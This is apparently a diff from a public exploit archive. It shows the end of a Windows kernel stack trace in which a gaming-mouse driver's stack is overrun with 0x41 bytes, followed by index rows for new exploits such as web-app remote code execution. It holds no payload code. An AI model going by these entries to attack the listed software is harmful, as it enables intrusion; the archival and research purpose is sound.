fffff807`344a5748 fffff807`344a5720 GM312Fltr+0xe1e +fffff807`2e1ffbaf fffff807`36bc0e94 00000000`00000000 00000000`00000000 00000000`00000000 GM312Fltr+0xea7 +fffff807`2e087547 fffff807`344a5710 00000000`00000000 ffffe08b`abb1e380 fffff807`36bc0b5d nt!RtlpExecuteHandlerForException+0xf +fffff807`2e086136 ffffe08b`abb1dcf8 fffff807`344a5e20 ffffe08b`abb1dcf8 ffffe30a`242183c0 nt!RtlDispatchException+0x297 +fffff807`2e1f7b82 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 nt!KiDispatchException+0x186 +fffff807`2e1f7b50 fffff807`2e208da5 00000000`ffffffff fffff807`2e0c3216 00000000`00000010 nt!KxExceptionDispatchOnExceptionStack+0x12 +fffff807`2e208da5 00000000`ffffffff fffff807`2e0c3216 00000000`00000010 00000000`00000246 nt!KiExceptionDispatchOnExceptionStackContinue +fffff807`2e204ae0 ffffe30a`1ce27c00 ffffe30a`1ce21010 00000000`00000000 00000000`00000000 nt!KiExceptionDispatch+0x125 +fffff807`2e1fe0c7 fffff807`2aab9180 000fa40d`b19b3dfe ffffe30a`27381080 fffff807`2eaea710 nt!KiGeneralProtectionFault+0x320 +fffff807`2e1fda76 7fffe30a`29e4bb10 00000000`ffffffff 00000000`00000000 00000000`00000000 nt!SwapContext+0x377 +fffff807`2e00c970 ffffe30a`00000006 00000000`ffffffff 00000000`00000000 ffffe30a`24218498 nt!KiSwapContext+0x76 +fffff807`2e00be9f ffffe30a`27381080 fffff807`36b819b6 ffffe08b`abb1e270 00000000`00000000 nt!KiSwapThread+0x500 +fffff807`2e00b743 ffffe30a`00000034 00000000`00000000 ffffe30a`23c6d800 ffffe30a`273811c0 nt!KiCommitThreadWait+0x14f +fffff807`36bc0ca2 ffffe08b`abb1e350 fffff807`00000000 00000000`00000000 00000000`00004100 nt!KeWaitForSingleObject+0x233 +fffff807`36bc0b5d ffffffff`ff676980 00000000`00000000 00000000`00000bb8 fffff807`35142017 GM312Fltr+0xca2 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 GM312Fltr+0xb5d +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 
41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 
41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 
41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 
41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 
41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 
41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 
41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 
41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 
41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
+41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
+41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
+41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 00000000`0020027f 0x41414141`41414141
+41414141`41414141 41414141`41414141 41414141`41414141 00000000`0020027f 00000000`5c4eafe0 0x41414141`41414141
+41414141`41414141 41414141`41414141 00000000`0020027f 00000000`5c4eafe0 00000000`00000000 0x41414141`41414141
+41414141`41414141 00000000`0020027f 00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80 0x41414141`41414141
+00000000`0020027f 00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80 00000000`00000000 0x41414141`41414141
+00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80 00000000`00000000 00000000`00000000 0x20027f
+00000000`00000000 0000ffff`00001f80 00000000`00000000 00000000`00000000 00000000`00000000 MSVCR90!pow+0x4e0
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 6b4e46cf0..7886720c5 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5252,6 +5252,7 @@ id,file,description,date,author,type,platform,port
 40524,exploits/osx/dos/40524.py,"VOX Music Player 2.8.8 - '.pls' Denial of Service",1970-01-01,"Antonio Z.",dos,osx,
 40536,exploits/windows/dos/40536.py,"Mozilla Firefox 49.0.1 - Denial of Service",1970-01-01,"sultan albalawi",dos,windows,
 43596,exploits/windows/dos/43596.py,"OBS Studio 20.1.3 - Local Buffer Overflow",1970-01-01,ScrR1pTK1dd13,dos,windows,
+50311,exploits/windows/dos/50311.py,"Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial-Of-Service (PoC)",1970-01-01,"Quadron Research Lab",dos,windows,
 43710,exploits/windows/dos/43710.js,"Microsoft Edge Chakra JIT - Incorrect Bounds Calculation",1970-01-01,"Google Security Research",dos,windows,
 43713,exploits/windows/dos/43713.js,"Microsoft Edge Chakra - 'JavascriptGeneratorFunction::GetPropertyBuiltIns' Type Confusion",1970-01-01,"Google Security Research",dos,windows,
 43715,exploits/windows/dos/43715.js,"Microsoft Edge Chakra - Incorrect Scope Handling",1970-01-01,"Google Security Research",dos,windows,
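Review bot: The new row `50311,exploits/windows/dos/50311.py,...` is inserted between 43596 and 43710, although every other row in this hunk (40524, 40536, 43596, 43710, 43713, 43715) runs in ascending id order within the dos/windows group. If ascending id within a type/platform group is the file's convention, the row belongs after the last dos/windows entry of that group rather than here. The two rows appended in the final hunk of this file (50308, 50310) do keep that order, so this insertion is the only one that diverges; if the group is deliberately unsorted, it can stay as is.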
@@ -17259,7 +17260,6 @@ id,file,description,date,author,type,platform,port
 35924,exploits/windows/remote/35924.py,"ClearSCADA - Remote Authentication Bypass",1970-01-01,"Jeremy Brown",remote,windows,
 35925,exploits/hardware/remote/35925.txt,"Portech MV-372 VoIP Gateway - Multiple Vulnerabilities",1970-01-01,"Zsolt Imre",remote,hardware,
 35928,exploits/windows/remote/35928.html,"Pro Softnet IDrive Online Backup 3.4.0 - ActiveX 'SaveToFile()' Arbitrary File Overwrite",1970-01-01,"High-Tech Bridge SA",remote,windows,
-35932,exploits/hardware/remote/35932.c,"VSAT Sailor 900 - Remote Overflow",1970-01-01,"Nicholas Lemonias",remote,hardware,
 35948,exploits/windows/remote/35948.html,"X360 VideoPlayer ActiveX Control 2.6 - ASLR + DEP Bypass",1970-01-01,Rh0,remote,windows,
 35949,exploits/windows/remote/35949.txt,"Symantec Encryption Management Server < 3.2.0 MP6 - Remote Command Injection",1970-01-01,"Paul Craig",remote,windows,
 35961,exploits/hp-ux/remote/35961.py,"HP Data Protector 8.x - Remote Command Execution",1970-01-01,"Juttikhun Khamchaiyaphum",remote,hp-ux,
@@ -44426,3 +44426,5 @@ id,file,description,date,author,type,platform,port
 50305,exploits/php/webapps/50305.py,"Online Food Ordering System 2.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Abdullah Khawaja",webapps,php,
 50306,exploits/php/webapps/50306.py,"Church Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Abdullah Khawaja",webapps,php,
 50307,exploits/php/webapps/50307.txt,"Budget and Expense Tracker System 1.0 - Authenticated Bypass",1970-01-01,"Prunier Charles-Yves",webapps,php,
+50308,exploits/php/webapps/50308.txt,"Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Abdullah Khawaja",webapps,php,
+50310,exploits/php/webapps/50310.py,"WebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php,